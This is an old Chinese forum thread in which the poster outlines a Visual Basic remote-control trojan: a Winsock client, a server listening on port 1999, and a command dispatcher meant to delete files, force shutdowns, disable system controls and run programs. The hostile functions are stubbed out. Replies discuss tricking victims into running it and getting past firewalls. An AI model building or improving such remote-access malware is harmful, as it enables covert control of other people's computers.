如何用VB写一个成功的木马程序,贴出源码并请指教了

ehais 2003-09-14 05:02:42
用VB写木马真是太难了 同,写一个成功的木马更难
---- 使用VB建立两个程序,一个为客户端程序Client,一个为服务器端程序systry。

---- 在Client工程中建立一个窗体,加载WinSock控件,称为tcpClient,协议选择TCP,再加入两个文本框,用以输入服务器的IP地址或服务器名,然后建立一个按钮,按下之后就可以对连接进行初始化了,代码如下:

Private Sub cmdConnect_Click()
If Len(Text1.Text) = 0 And Len(Text2.Text) = 0 Then
MsgBox ("请输入主机名或主机IP地址。")
Exit Sub
Else
If Len(Text1.Text) > 0 Then
tcpClient.RemoteHost = Text1.Text
Else
tcpClient.RemoteHost = Text2.Text
End If
End If
tcpClient.Connect
Timer1.Enabled = True
End Sub

---- 连接建立之后就可以使用DataArrival事件处理所收到的数据了。

---- 在服务器端systry工程也建立一个窗体,加载WinSock控件,称为tcpServer,协议选择TCP,在Form_Load事件中加入如下代码:

Private Sub Form_Load()
tcpServer.LocalPort = 1999
tcpServer.Listen
End Sub

---- 准备应答客户端程序的请求连接,使用ConnectionRequest事件来应答户端程序的请求,代码如下:

Private Sub tcpServer_ConnectionRequest
(ByVal requestID As Long)
If tcpServer.State < > sckClosed Then
tcpServer.Close‘检查控件的 State 属性是否为关闭的。
End If '如果不是,在接受新的连接之前先关闭此连接。
tcpServer.Accept requestID
End Sub

---- 这样在客户端程序按下了连接按钮后,服务器端程序的ConnectionRequest事件被触发,执行了以上的代码。如果不出意外,连接就被建立起来了。

---- 建立连接后服务器端的程序通过DataArrival事件接收客户机端程序所发的指令运行既定的程序。如:把服务器端的驱动器名、目录名、文件名等传到客户机端,客户机端接收后用TreeView控件以树状的形式显示出来,浏览服务器端文件目录;强制关闭或重启服务器端的计算机;屏蔽任务栏窗口;屏蔽开始菜单;按照客户机端传过来的文件名或目录名,而删除它;屏蔽热启动键;运行服务器端的任何程序;还包括获取目标计算机屏幕图象、窗口及进程列表;激活、终止远端进程;打开、关闭、移动远端窗口;控制目标计算机鼠标的移动与动作;交换远端鼠标的左右键;在目标计算机模拟键盘输入,下载、上装文件;提取、创建、修改目标计算机系统注册表关键字;在远端屏幕上显示消息。DataArrival事件程序如下:

Private Sub tcpServer_DataArrival
(ByVal bytesTotal As Long)
Dim strData As String
Dim i As Long
Dim mKey As String
tcpServer.GetData strData
‘接收数据并存入strData
For i = 1 To Len(strData)
‘分离strData中的命令
If Mid(strData, i, 1) = "@" Then
mKey = Left(strData, i - 1)
‘把命令ID号存入mKey

‘把命令参数存入strData
strData = Right(strData, Len(strData) - i)
Exit For
End If
Next i
Select Case Val(mKey)
Case 1
‘驱动器名、目录名、文件名
Case 2
强制关闭服务器端的计算机
Case 3
强制重启服务器端的计算机
Case 4
屏蔽任务栏窗口;
Case 5
屏蔽开始菜单;
Case 6
按照客户机端传过来的文件名或目录名,而删除它;
Case 7
屏蔽热启动键;
Case 8
运行服务器端的任何程序
End Select
End Sub
详细程序略。


---- 客户机端用tcpClient.SendData发命令。命令包括命令ID和命令参数,它们用符号“@”隔开。

---- 另外,当客户机端断开与服务器端的来接后,服务器端应用tcpServer_Close事件,来继续准备接收客户机端的请求,其代码如下:

Private Sub tcpServer_Close()
tcpServer.Close
tcpServer.Listen
End Sub
有兴相同的朋友可与我联系 ehais@msn.com
...全文
296 16 打赏 收藏 转发到动态 举报
写回复
用AI写文章
16 条回复
切换为时间正序
请发表友善的回复…
发表回复
mudai 2003-09-16
  • 打赏
  • 举报
回复
木马用VB写,不会吧,我逛晕,你怎么放到人家机子上啊,不自动传播,不太好吧
木马最好还是用VC或Jave写,这样的话好传播,才能叫人感觉到你的威力啊,你说是吧
xingnup 2003-09-16
  • 打赏
  • 举报
回复
up
yas 2003-09-16
  • 打赏
  • 举报
回复
winsock是需要winsock.ocx的,你哪里来呢?
vansoft 2003-09-16
  • 打赏
  • 举报
回复
一般,还需努力。
dreamreality 2003-09-16
  • 打赏
  • 举报
回复
你这样的代码只是原理,我早就看过了,没有什么,他们说的对,用VB写真的有点。。。。。。。。,因为他有运行需要好多库的,少掉一个都不能运行的,还是想一想,改用其他的语言吧
captainivy 2003-09-16
  • 打赏
  • 举报
回复
efei 2003-09-15
  • 打赏
  • 举报
回复
up
sgx 2003-09-15
  • 打赏
  • 举报
回复
接分
viena 2003-09-15
  • 打赏
  • 举报
回复
女子 白勺
yijiansong 2003-09-15
  • 打赏
  • 举报
回复
高手!
只要你自己写的木马能攻击我的机器,我结不怪你!
Lionking1027 2003-09-15
  • 打赏
  • 举报
回复
思路是没错,但是还存在许多实际使用中的问题,楼上说的就是一个问题,还有,你怎么搞定防火墙?你怎么进行文件的绑定?你怎么让别人运行他?…………………………………………老兄,写木马还是写点别的吧,实际一点!!
CHKK 2003-09-14
  • 打赏
  • 举报
回复
写的不错,但你怎莫骗他把VB的那些运行用的.dll 文件装上?
supwjhuLoveCjj 2003-09-14
  • 打赏
  • 举报
回复
能用BCB改写一下吗
wangk 2003-09-14
  • 打赏
  • 举报
回复
写木马用VB的似乎比较少。
danielinbiti 2003-09-14
  • 打赏
  • 举报
回复
楼上只是一个思路吧。
呵呵,木马难在功能的实现
MarGo 2003-09-14
  • 打赏
  • 举报
回复
恭喜了!!!(来点分是实在的--"俺是东北人")

7,763

社区成员

发帖
与我相关
我的任务
社区描述
VB 基础类
社区管理员
  • VB基础类社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧